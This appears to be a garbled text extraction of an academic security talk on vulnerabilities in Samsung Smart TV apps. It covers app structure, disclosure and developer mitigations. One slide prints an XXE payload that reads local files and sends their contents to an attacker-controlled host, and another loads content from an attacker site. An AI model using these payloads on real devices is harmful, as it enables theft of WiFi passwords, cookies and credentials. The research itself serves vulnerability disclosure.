Not so Smart: On Smart TV Apps Marcus Niemietz , Juraj - - PowerPoint PPT Presentation
Not so Smart: On Smart TV Apps Marcus Niemietz , Juraj Somorvsky, Chris;an Mainka, Jrg Schwenk {firstname.lastname}@rub.de Ruhr University Bochum &
Marcus ¡Niemietz, ¡Juraj ¡Somorvsky, ¡Chris;an ¡ Mainka, ¡Jörg ¡Schwenk ¡
{firstname.lastname}@rub.de ¡ ¡ Ruhr ¡University ¡Bochum ¡& ¡3curity ¡GmbH ¡
– Social ¡networks ¡like ¡Facebook ¡ – Streaming ¡services ¡like ¡Nealix ¡or ¡Watchever ¡ – Games ¡like ¡Angry ¡Birds ¡ – Browsing ¡websites ¡
– Internet ¡connec;on ¡ – App ¡rendering ¡engine(s) ¡(e.g., ¡from ¡a ¡browser) ¡ – Installed ¡aXacker’s ¡app ¡
– Sniffing ¡HTTP ¡traffic ¡
– For ¡example ¡a ¡USB ¡flash ¡drive ¡
– Device’s ¡app ¡store ¡or ¡aXacker ¡controlled ¡website ¡
– 25 ¡pre-‑installed ¡ (WATCHEVER ¡v2.200, ¡ImmoScout24 ¡v1.010) ¡ – 31 ¡app ¡store ¡ ¡ (NewMoove ¡v2.2003, ¡Putpat ¡TV ¡v2.504) ¡
– ¡34 ¡apps: ¡Facebook, ¡Ebay, ¡and ¡Viewster ¡
– Samsung ¡GALAXY ¡Apps ¡ – Samsung ¡Link ¡ – Find ¡My ¡Mobile ¡ – Smart ¡Appliance ¡ – Samsung ¡e-‑Store ¡ – PEN.UP ¡ – Samsung ¡Wallet, ¡S ¡Health, ¡Samsung ¡Cloud, ¡... ¡
– config.xml – index.html
– Op;onal ¡HTML, ¡CSS, ¡JS, ¡etc. ¡
– Mozilla/5.0 ¡(SmartHub;SMART-‑TV;U;Linux/ SmartTV+2014;Maple2012) ¡AppleWebKit/537.42+ ¡ (KHTML, ¡like ¡Gecko) ¡Smart ¡TV ¡Safari/537.42+ ¡
– file:///dtv/usb/sda1/UIR6_0.100_Europe_20150309/ index.html?country=D&language=17&lang=en-‑ GB&modelid=14_X14_2D&server=opera;on&remoco n=0_650_259_22&area=PANEURO&product=0&mgrv er=6.1571&ssoid=foobar@example.org&ssopw=secr et&authtoken=MORE-‑STUFF&all_ar;st=jennifer-‑ lopez&x_ar;st=&video_content_type=vevotv&ns_st_ pr=Top10Now&realmodel=UE22H5600&networktype =0 ¡
– Security ¡reasons? ¡ – Any ¡ideas ¡for ¡a ¡bypass? ¡
<object class="iframelook" type="text/html" data="http:// www.attackers.org/tv" style="width: 100%; height:100%“>
– XML ¡External ¡En;ty: ¡ Read ¡files ¡with ¡one ¡line ¡automa;cally ¡
– XMLHXpRequest: ¡ Read ¡all ¡files ¡by ¡ac;va;ng ¡the ¡app ¡
<?xml ¡version="1.0" ¡encoding="UTF-‑8"?> ¡ <!DOCTYPE ¡rooXag ¡[ ¡ <!ENTITY ¡% ¡ext ¡SYSTEM ¡"file:///mtd_chmap/…"> ¡ <!ENTITY ¡% ¡dtd ¡SYSTEM ¡"file:///dtv/usb/sda1/XXE/ aXacker.xml"> ¡ ¡ ¡ %dtd; ¡ ]> ¡ <widget ¡xmlns="hXp://www.samsung.com/"> ¡… ¡
<!ENTITY ¡% ¡all ¡"<!ENTITY ¡send ¡SYSTEM ¡'hXp:// www.aXacker.com/tv/?%ext;'>"> ¡ %all ¡
– Wifi ¡data ¡(incl. ¡password) ¡ – Apps ¡Cookies ¡ ¡ – Local ¡Storage ¡(ZaXoo: ¡login ¡data) ¡ – SSO ¡username ¡(one ¡line) ¡ – Browser ¡history ¡ – Common ¡user ¡inputs ¡
– Par;al ¡webcam ¡access ¡
– We ¡can ¡make ¡a ¡spoofed ¡client ¡ – We ¡cannot ¡get ¡user ¡creden;als ¡
– Leaking ¡data ¡is ¡not ¡new ¡
conversa;ons ¡may ¡be ¡recorded ¡(hXp://is.gd/Wxq2oy) ¡
(hXp://is.gd/VLC0yE) ¡
– Leaking ¡creden;als ¡without ¡any ¡aXack ¡is ¡new ¡
– What ¡happens? ¡
– we ¡reward ¡only ¡unknown ¡and ¡unreported ¡issues ¡
(2012 ¡to ¡2015). ¡ – you ¡agree ¡not ¡to ¡disclose ¡the ¡vulnerabili;es ¡to ¡3rd ¡ par;es ¡without ¡our ¡agreement ¡(we ¡can ¡agree ¡on ¡a ¡ publica;on ¡date ¡axer ¡the ¡security ¡patches ¡are ¡ deployed)“ ¡
– Use ¡TLS ¡ – Do ¡not ¡save ¡sensi;ve ¡data ¡(unencrypted) ¡ – Do ¡not ¡run ¡with ¡root ¡priviledges ¡ – Use ¡a ¡sandboxing ¡mechanism ¡
¡